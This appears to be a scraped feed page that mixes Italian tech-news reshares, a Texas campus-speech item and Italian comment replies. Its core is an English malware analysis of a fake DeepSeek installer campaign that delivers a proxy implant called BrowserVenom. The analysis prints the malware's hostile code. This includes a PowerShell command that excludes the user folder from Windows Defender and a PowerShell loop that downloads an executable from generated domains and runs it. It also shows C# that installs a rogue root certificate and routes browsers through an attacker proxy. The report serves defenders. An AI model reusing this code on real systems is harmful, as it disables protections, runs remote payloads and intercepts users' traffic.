Se un’estensione per wallet raggiunge un certo livello di rischio, i revisori umani vengono avvisati per condurre un’analisi più approfondita. Se l’estensione viene ritenuta dannosa, viene immediatamente bloccata.”
Andreas Wagner, specialista in operazioni di componenti aggiuntivi e responsabile del sistema di revisione dei contenuti e della sicurezza di addons.mozilla.org, sottolinea che negli ultimi anni il suo team ha scoperto e rimosso centinaia di estensioni dannose, tra cui wallet di criptovalute fraudolenti.
“È un continuo gioco del gatto e del topo, con gli sviluppatori che cercano di aggirare i nostri metodi di rilevamento”, spiega Wagner. “Controlla il sito web del tuo portafoglio di criptovalute per vedere se ha un’estensione ufficiale e usa solo quelle linkate sul sito ufficiale.”
L'articolo Mozilla dichiara guerra ai ladri di cripto: nuovo scudo contro estensioni pericolose su Firefox proviene da il blog della sicurezza informatica.
IA vs cybercrime: OpenAI svela come ChatGPT ha fermato attacchi russi e cinesi nel 2025
@Informatica (Italy e non Italy 😁)
Un rapporto di OpenAI svela le tattiche di inganno e influenza guidate dall'IA e la risposta proattiva contro attori statali e criminali, in particolare russi e cinesi. Grazie a ChatGPT smantellati o interrotti cyber crimini,
Informatica (Italy e non Italy 😁) reshared this.
Il fattore umano nella cyber security è ancora una criticità
@Informatica (Italy e non Italy 😁)
Il rischio umano nelle organizzazioni moderne rappresenta la priorità principale per i team di sicurezza informatica. La fotografia ce la regala il nono rapporto annuale sullo stato del settore, pubblicato da Mimecast e intitolato "The State of Human Risk 2025"
L'articolo Il fattore
Informatica (Italy e non Italy 😁) reshared this.
Apple Intelligence ci riprova alla Wwdc 2025. Sarà la volta buona?
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Attesa al varco della Worldwide Developer Conference 2025 Apple concentra l'attenzione sul maquillage grafico del proprio sistema operativo con novità che la pongono in scia al rivale Android di Google.
Informatica (Italy e non Italy 😁) reshared this.
Toxic trend: Another malware threat targets DeepSeek
Introduction
DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously reported attacks with malware being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.
But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install BrowserVenom, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim’s network traffic and collect data.
Phishing lure
The infection was launched from a phishing site, located at https[:]//deepseek-platform[.]com
. It was spread via malvertising, intentionally placed as the top result when a user searched for “deepseek r1”, thus taking advantage of the model’s popularity. Once the user reaches the site, a check is performed to identify the victim’s operating system. If the user is running Windows, they will be presented with only one active button, “Try now”. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.
Malicious website mimicking DeepSeek
Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the proxy1.php
URL path with a “Download now” button. Clicking that results in downloading the malicious installer named AI_Launcher_1.21.exe
from the following URL: https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe
.
We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites’ functionality, which suggests that they are developed by Russian-speaking threat actors.
Malicious installer
The malicious installer AI_Launcher_1.21.exe
is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.
This is another fake CAPTCHA that is loaded from https[:]//casoredkff[.]pro/captcha
. After the checkbox is ticked, the URL is appended with /success
, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.
Two options to install abused LLM frameworks
Clicking either of the “Install” buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: MLInstaller.Runner.Run()
. This function triggers the infectious part of the implant.
private async void lmBtn_Click(object sender, EventArgs e)
{
try
{
MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
this.lmBtn.Text = "Downloading..";
this.lmBtn.Enabled = false;
Action action;
if ((action = MainFrm.<>O.<0>__Run) == null)
{
action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); # <--- malware initialization
}
Task.Run(action);
CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]
When the MLInstaller.Runner.Run()
function is executed in a separate thread on the machine, the infection develops in the following three steps:
- First, the malicious function tries to exclude the user’s folder from Windows Defender’s protection by decrypting a buffer using the AES encryption algorithm.
The AES encryption information is hardcoded in the implant:Type AES-256-CBC Key 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 IV 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.
powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE
It should be noted that this command needs administrator privileges and will fail in case the user lacks them. - After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as
%USERPROFILE%\Music\1.exe
under the user’s profile and then executed.$ap = "/api/getFile?fn=lai.exe";
$b = $null;
foreach($i in 0..1000000) {
$s = if ($i - gt 0) {
$i
} else {
""
};
$d = "https://app-updater$s.app$ap";
$b = (New - Object Net.WebClient).DownloadData($d);
if ($b) {
break
}};
if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() - match"^v2") {
[IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
Start - Process "$env:USERPROFILE\Music\1.exe" - NoNewWindow
} else {
([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
}
At the moment of our research, there was only one domain in existence:app-updater1[.]app
. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section. - Then the
MLInstaller.Runner.Run()
function locates a hardcoded stage two payload in the class and variableConfigFiles.load
of the malicious installer’s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run.
Loaded implant: BrowserVenom
We dubbed the next-stage implant BrowserVenom because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim’s browsing activity while decrypting their traffic.
First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:
[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
StoreLocation storeLocation = StoreLocation.LocalMachine;
X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
x509Store.Open(OpenFlags.ReadWrite);
x509Store.Add(x509Certificate);
[...]
Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the proxy-server
argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user’s profile preferences:
[...]
new ChromeModifier(new string
[] {
"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
"blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string
[] {
"--proxy-server=\"",
ProfileSettings.Host,
":",
ProfileSettings.Port,
"\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]
The settings currently utilized by the malware are as follows:
public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);
The variables Host
and Port
are the ones used as the proxy settings, and the ID
and HWID
are appended to the browser’s User-Agent, possibly as a way to keep track of the victim’s network traffic.
Conclusion
As we have been reporting, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors’ use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.
At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.
To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.
Kaspersky products detect this threat as HEUR:Trojan.Win32.Generic
and Trojan.Win32.SelfDel.iwcv
.
Indicators of Compromise
Hashes
d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe
dc08e0a005d64cc9e5b2fdd201f97fd6
Domains and IPs
deepseek-platform[.]com | Main phishing site |
r1deepseek-ai[.]com | Distribution server |
app-updater1[.]app | Stage #2 servers |
app-updater2[.]app | |
app-updater[.]app | |
141.105.130[.]106 | Malicious proxy |
Apple Intelligence ci riprova alla Wwdc 2025. Sarà la volta buona?
L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Attesa al varco della Worldwide Developer Conference 2025 Apple concentra l'attenzione sul maquillage grafico del proprio sistema operativo con novità che la pongono in scia al rivale Android di Google.
Informatica (Italy e non Italy 😁) reshared this.
Texas is about to ban all speech on campuses at night. Seriously.
Texas lawmakers trying to muzzle campus protests have just passed one of the most ridiculous anti-speech laws in the country, as Freedom of the Press Foundation senior adviser Caitlin Vogus explains in the Houston Chronicle.
A new bill, SB 2972, would require public universities in Texas to adopt policies prohibiting “engaging in expressive activities on campus between the hours of 10 p.m. and 8 a.m.” Expressive activity includes “any speech or expressive conduct” protected by the First Amendment or Texas Constitution.
As Vogus writes, Governor Greg Abbott “should veto this unconstitutional and absurd bill before Texas has to waste taxpayers’ money defending it. And Texans should find some time — preferably at night — to exercise their First Amendment right to question the competence of the legislators who wrote or supported this bill.”
RFanciola
in reply to simona • • •simona likes this.
simona
in reply to simona • •Simon Perry
in reply to simona • •simona
in reply to simona • •like this
Simon Perry likes this.
Simon Perry
in reply to simona • •@simona già.
Una delle cose più tristi è sapere che tante persone hanno gli stessi ideali, o che li ritengono una "qualità" umana" 😢
simona likes this.
simona
in reply to simona • — (Livorno) •like this
Simon Perry likes this.
Simon Perry
in reply to simona • •@simona se riesci a capirlo, fammi sapere 😀
In 48 anni non sono riuscito a capirlo. Presumo per ignoranza, plagio, retropensieri per cui non potendo essere forti si cerchi qualcuno forte che somigli a come si vorrebbe essere.
Sempre perché, alla base, c'è questa benedetta litania dell'uomo forte che avrebbe sinceramente anche stancato: ma ci educano così...
simona likes this.